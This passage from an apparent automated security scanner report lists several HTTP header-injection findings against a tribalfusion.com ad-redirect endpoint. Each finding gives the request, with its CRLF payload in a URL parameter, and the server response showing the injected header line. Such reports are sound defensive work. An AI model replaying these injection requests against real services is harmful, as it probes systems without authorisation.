Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/55231
41eb9b5b7e2
/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.91. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 18]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 18 is copied into the Location response header. The payload dcb7f%0d%0a0409d70ef79 was submitted in the REST URL parameter 18. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/dcb7f%0d%0a0409d70ef79/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=[...]; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:13 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/dcb7f
0409d70ef79
/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.92. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 19]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 19 is copied into the Location response header. The payload e40b7%0d%0a009033edb6b was submitted in the REST URL parameter 19. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/e40b7%0d%0a009033edb6b HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=[...];

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=[...]; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:17 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/e40b7
009033edb6b

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.93. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 98627%0d%0a63aef2eccd5 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/98627%0d%0a63aef2eccd5/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=[...];

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=[...]; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:18 GMT;
Content-Type: text/html
Location: 98627
63aef2eccd5
/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.94. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 4bdfc%0d%0a7f541205292 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/4bdfc%0d%0a7f541205292/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=[...];

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=[...]; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:35 GMT;
Content-Type: text/html
Location: http:/4bdfc
7f541205292
/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.95. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 2b87a%0d%0ac9befaa23d0 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/2b87a%0d%0ac9befaa23d0/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=[...];

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=annFseoZdUQMo2HpivbwkXqrnTC3Gq4ZamyyXMNuQ5tpx4qkEqfbRrjjSdPNrBJTcUkZaZbfXx2aKlrIsUwBiFxVnWqtR1BUNFc109MAN5UxU7cik5WAjeajoV6F5D8yNswhqCd0j5AJcfQPB9oPXqfZcAqlKyrSZdNZdqVN0GeGG1mnmxdZaCyfIWG4u4vHZcvTyFdnGocxbW98c7xrVkIT71ESOa599qlUM0MVlGAAkV0iw1qCrwbsAlxlN5neGdydMBFHQpGefVxuZaMkal3YBuBBujHnmccCxp6NSXVhUNs60b1Zauc1EcPpcHJeM3e2Wc1078PTcXxVjmnBFn5dJP4g7SPr256gAwQ1YkNiaQGZcXWWjQsmqujiB6upZby3yueQ29GUBvLrDtOi0Fj2ZbqoowZbfNtZd6gS0QBsJvXmOYcpJy2aBMZaiaZdlfyn40bLvCnlcefNPFZd4snxT3weDudy0nIClYV2ZaxEQRuDyEyVFqSf3Yhl4Q1BvbnUjgasDkMdmmS4qvtHAh5YCmijb840ZaPQBB8SPmXwbugWTqNa4F3UNTra9nipGgdSIJAdcrUQLybFteG5r6G5g; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:47 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/2b87a
c9befaa23d0
/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.96. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload f77aa%0d%0a016a8b52948 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/f77aa%0d%0a016a8b52948/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=[...];

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=annFNfoZdUQMo2HpivbwkXqrnTC3Gq4ZamyyXMNuQ5tpx4qkEqfbRrjjSdPNrBJTcUkZaZbfXx2aKlrIsUwBiFxVnWqtR1BUNFc109MAN5UxU7cik5WAjeajoV6F5D8yNswhqCd0j5AJcfQPB9oPXqfZcAqlKyrSZdNZdqVN0GeGG1mnmxdZaCyfIWG4u4vHZcvTyFdnGocxbW98c7xrVkIT71ESOa599qlUM0MVlGAAkV0iw1qCrwbsAlxlN5neGdydMBFHQpGefVxuZaMkal3YBuBBujHnmccCxp6NSXVhUNs60b1Zauc1EcPpcHJeM3e2Ws14nKYTcncsKh8IFwbdcZcFdF6oZapYTIhf7yy6lxPytJShdrPm7bK3jtkwUaZaRaSiMTcG9CvcmTu2Exo3VWpgMAcyvW39AIaHdi3mXpZb5BfecTFMkSylJtg8fsCx9PpyYTKCcYQn4fVYFZb9HSyoQpMngmEQARRrTQ5DACnmUk5HkV4kwI9TACYmfXQxaDi8bCsrxmwBJrsFCwkg8owqwLwWigScYSsUqiSWZau3Jxh1WhIo4BvsWiPZacwQ20JUUdnsvMiGkuFPOs; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:52 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/f77aa
016a8b52948
/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.97. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 7c87b%0d%0abd5f277a4d9 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/7c87b%0d%0abd5f277a4d9/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aInFNfqkaHN7yktiZbuq4AsWQBQRavoZcRvIv2OLW1VHU4J3BbZbCT6ZbEuUQ7xoiCiUZclBfALPttFWXk9OBXeqbMy1VVEZdagfZdL8Wx7NR4XJhcuwVOpYxDjcHZbBx9ZcZbloWiaZbLhFwFuOZbWsMpY9EBA2PmhvyO5ZasmRCcPLvcL2SZbDMPu9t0TNBXPPqG0YW4n2pVxlvD14gSQoMnZdZbPcWiouFd6TuJP2sWpkS5Ieg772piDqsUqSlJ6LGxgUZdXa2rwL6kxiLgANjZaudyMmFur2s35pRGpQqQjRQwS5q5tS27wuVcct9BWBB2ITs03IueudAfqFMckwdnrlXrOPLFSelZdAYsrZaqdPePJODawVJ46Ef0mrnDr4DM3Um3O6tZaQbtCZcFff2bPvBKhvPnZdwVpwJPFZbdExaZbhlUZdNdUUZauIhScB3UL1eyYNAnESj3oevWes31BuWhmUuFVt0qUmsvscXbV7gQCXt08ieTnAnWBRjSIRP8UZao19fg4ZcMJknZbcrTZdZdsmTIodNBeLSavd08NWXt3VBQTr7O2rBT5hN5wsgxq06ZbXWQ9Jt4s0ZdfyNWsftJYPeqs3jF; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:06 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/7c87b
bd5f277a4d9
/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.98. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 8 is copied into the Location response header. The payload f3ce9%0d%0ae73052eb8f6 was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/f3ce9%0d%0ae73052eb8f6/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
